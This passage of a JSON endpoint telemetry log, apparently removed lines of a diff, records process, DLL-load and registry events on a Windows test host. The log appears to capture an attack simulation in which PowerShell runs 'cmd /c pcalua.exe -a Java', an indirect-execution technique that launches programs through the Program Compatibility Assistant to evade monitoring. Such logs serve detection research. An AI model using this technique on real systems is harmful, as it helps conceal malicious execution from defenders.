"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574007520016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574007520016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574007520016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574007520016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883574007520016, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"pcalua.exe -a Java\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7060, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883574007730000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "event_type": "file", - "file_name": "PCALUA.EXE-5EB8CBC1.pf", - "file_path": "C:\\Windows\\Prefetch\\PCALUA.EXE-5EB8CBC1.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\WINDOWS\\system32\\cmd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "command_line": "pcalua.exe -a Java", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5020, - "ppid": 7060, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "subtype": "create", - "timestamp": 131883574007840000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}", - "unique_ppid": "{42FC7E13-CC18-5C05-0000-0010D2505701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "pcalua.exe", - "image_path": "C:\\Windows\\System32\\pcalua.exe", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "pcaui.dll", - "image_path": "C:\\Windows\\System32\\pcaui.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "dui70.dll", - "image_path": "C:\\Windows\\System32\\dui70.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "wer.dll", - "image_path": "C:\\Windows\\System32\\wer.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", - "registry_value": "W32:000000000008056A", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "msctf.dll", - "image_path": "C:\\Windows\\System32\\msctf.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "image_load", - "image_name": "TextInputFramework.dll", - "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "CoreUIComponents.dll", - "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008300000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreUAPCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008300000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883574008300000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883574008300000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", - "registry_value": "DelegateFolders", - "timestamp": 131883574008300000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "ndfapi.dll", - "image_path": "C:\\Windows\\System32\\ndfapi.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "wdi.dll", - "image_path": "C:\\Windows\\System32\\wdi.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "duser.dll", - "image_path": "C:\\Windows\\System32\\duser.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "xmllite.dll", - "image_path": "C:\\Windows\\System32\\xmllite.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_value": "Journal", - "timestamp": 131883574008610000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "image_load", - "image_name": "atlthunk.dll", - "image_path": "C:\\Windows\\System32\\atlthunk.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008610000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": 